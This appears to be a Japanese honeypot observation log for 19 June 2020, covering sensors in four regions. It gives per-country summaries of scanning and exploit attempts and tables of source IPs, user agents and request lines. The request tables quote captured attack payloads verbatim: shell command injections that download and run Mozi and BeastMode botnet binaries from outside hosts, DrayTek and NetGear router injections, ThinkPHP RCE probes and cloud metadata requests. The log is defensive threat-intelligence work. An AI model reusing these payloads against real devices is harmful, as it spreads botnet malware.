ハニーポット(仮) 観測記録 2020/06/19分です。
特徴
Location:JP
GPONルータの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
18[.]179[.]20[.]5に関する不正通信
5[.]188[.]210[.]101に関する不正通信
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 77.73.67.240/beastmode/b3astmode.arm7; chmod 777 /tmp/b3astmode.arm7; sh /tmp/b3astmode.arm7 BeastMode.Rep.Jaws
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:US
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
polaris botnetによるスキャン行為
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 77.73.67.240/beastmode/b3astmode.arm7; chmod 777 /tmp/b3astmode.arm7; sh /tmp/b3astmode.arm7 BeastMode.Rep.Jaws
Location:UK
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
を確認しました。
Location:SG
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
polaris botnetによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
5[.]188[.]210[.]101に関する不正通信
を確認しました。
他
アクセス数推移
JP:総アクセス数:78 (前日比:-107)
US:総アクセス数:34 (前日比:+14)
UK:総アクセス数:56 (前日比:-9)
SG:総アクセス数:156 (前日比:-93)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 5.188.206.50 | Russia |
| 1 | 5.188.210.101 | Russia |
| 17 | 44.224.22.196 | United States |
| 17 | 44.225.84.206 | United States |
| 1 | 46.166.128.174 | Netherlands |
| 31 | 91.83.84.98 | Hungary |
| 1 | 93.67.152.242 | Italy |
| 2 | 94.177.214.123 | Italy |
| 2 | 103.196.52.226 | India |
| 1 | 128.14.133.58 | United States |
| 1 | 139.204.122.61 | China |
| 1 | 162.243.137.118 | United States |
| 1 | 162.243.140.118 | United States |
| 1 | 180.124.50.190 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 23 | - |
| 14 | AWS Security Scanner |
| 4 | Hello, world |
| 31 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | \x03 | ||
| 10 | \x16\x03\x01 | ||
| 10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
| 1 | GET | /ReportServer | HTTP/1.1 |
| 1 | GET | /category/tvs/ | HTTP/1.1\n |
| 4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
| 31 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+77.73.67.240/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws | HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /solr/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | http[:]//169[.]254[.]169[.]254/ | HTTP/1.1 |
| 2 | GET | http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | http[:]//5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
| 2 | GET | http[:]//example[.]com/ | HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 8 | 3.128.18.189 | United States |
| 1 | 45.136.108.64 | Germany |
| 2 | 46.166.128.174 | Netherlands |
| 10 | 58.144.208.115 | China |
| 1 | 61.7.171.151 | Thailand |
| 1 | 83.110.13.138 | United Arab Emirates |
| 1 | 93.39.97.39 | Italy |
| 3 | 94.177.214.123 | Italy |
| 1 | 95.188.71.25 | Russia |
| 1 | 109.130.180.30 | Belgium |
| 1 | 151.177.152.54 | Sweden |
| 1 | 162.243.137.241 | United States |
| 1 | 205.185.114.231 | United States |
| 1 | 210.186.154.100 | Malaysia |
| 1 | 219.74.19.228 | Singapore |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 3 | - |
| 1 | Go-http-client/1.1 |
| 1 | Hello, world |
| 2 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 2 | XTC |
| 1 | XTC BOTNET |
| 8 | curl/7.68.0 |
| 1 | polaris botnet |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | |||
| 1 | \x03 | ||
| 1 | GET | /ReportServer | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf | HTTP/1.1 |
| 1 | GET | /app/config/ | HTTP/1.1 |
| 1 | GET | /app/config/config.ini | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /include/ | HTTP/1.1 |
| 1 | GET | /include/config.ini | HTTP/1.1 |
| 1 | GET | /include/config/ | HTTP/1.1 |
| 1 | GET | /include/config/config.ini | HTTP/1.1 |
| 1 | GET | /include/functions/ | HTTP/1.1 |
| 1 | GET | /include/functions/config.ini | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+77.73.67.240/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /wp-content/uploads/2017/03/Personal-Reviews.png | HTTP/1.1 |
| 4 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /boaform/admin/formPing | HTTP/1.1 |
| 3 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
| 1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 23.129.64.217 | United States |
| 1 | 45.92.126.74 | United States |
| 1 | 74.207.253.68 | United States |
| 1 | 83.110.13.138 | United Arab Emirates |
| 2 | 94.177.214.123 | Italy |
| 5 | 115.236.30.75 | China |
| 1 | 128.14.133.58 | United States |
| 3 | 129.213.35.30 | United States |
| 3 | 129.213.110.103 | United States |
| 3 | 130.61.35.239 | United States |
| 3 | 130.61.36.206 | United States |
| 3 | 132.145.96.157 | United States |
| 3 | 132.145.152.137 | United States |
| 3 | 132.145.202.62 | United States |
| 3 | 140.238.69.10 | United States |
| 1 | 141.98.10.47 | Republic of Lithuania |
| 1 | 162.243.138.77 | United States |
| 1 | 162.243.143.219 | United States |
| 1 | 175.4.246.166 | China |
| 1 | 190.128.154.222 | Paraguay |
| 1 | 190.145.12.58 | Colombia |
| 13 | 195.54.160.135 | Russia |
| 1 | 205.185.114.231 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 5 | - |
| 1 | Mozilla/5.0 (Windows ME 4.9; rv:31.0) Gecko/20100101 Firefox/31.7 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 13 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 5 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 24 | Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | XTC |
| 1 | XTC BOTNET |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x16\x03\x01\x02 | ||
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 8 | GET | /HNAP1 | HTTP/1.1 |
| 1 | GET | /ReportServer | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /async/ | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1592429439 | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1592430078 | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1592451463 | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1592464035 | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1592464468 | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1592465815 | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1592497848 | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1592502141 | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /solr/ | HTTP/1.1 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /vicidial/admin.php?ADD=140000000000 | HTTP/1.1 |
| 1 | HEAD | / | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 3 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 2 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
| 8 | POST | /sdk | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 101 | 5.102.13.28 | Italy |
| 1 | 5.188.210.101 | Russia |
| 1 | 75.148.156.244 | United States |
| 1 | 80.54.244.58 | Poland |
| 29 | 84.124.195.107 | Spain |
| 1 | 93.54.106.119 | Italy |
| 2 | 94.177.214.123 | Italy |
| 3 | 106.13.163.130 | China |
| 1 | 116.100.8.116 | Vietnam |
| 2 | 130.180.72.18 | Germany |
| 1 | 162.243.141.82 | United States |
| 1 | 193.118.53.210 | Germany |
| 10 | 195.54.160.135 | Russia |
| 2 | 205.185.114.231 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 3 | - |
| 2 | Mozilla/5.0 |
| 101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 29 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 |
| 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 3 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 1 | polaris botnet |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | - | ||
| 1 | GET | /2phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /MyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /PMA/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /ReportServer | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf | HTTP/1.1 |
| 1 | GET | /database/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/phpMyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /db/phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /dbadmin/index.php?lang=en | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /myadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmy/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyAdmin/index.php?lang=en | HTTP/1.1 |
| 101 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin1/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin3/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin4/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phppma/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /pma/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /program/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /shell?busybox | HTTP/1.1 |
| 1 | GET | /shopdb/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /solr/ | HTTP/1.1 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /steve_the_diamond_miner | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en | HTTP/1.1 |
| 1 | GET | http[:]//5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 3 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /boaform/admin/formPing | HTTP/1.1 |
| 1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//192[.]3[.]45[.]185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
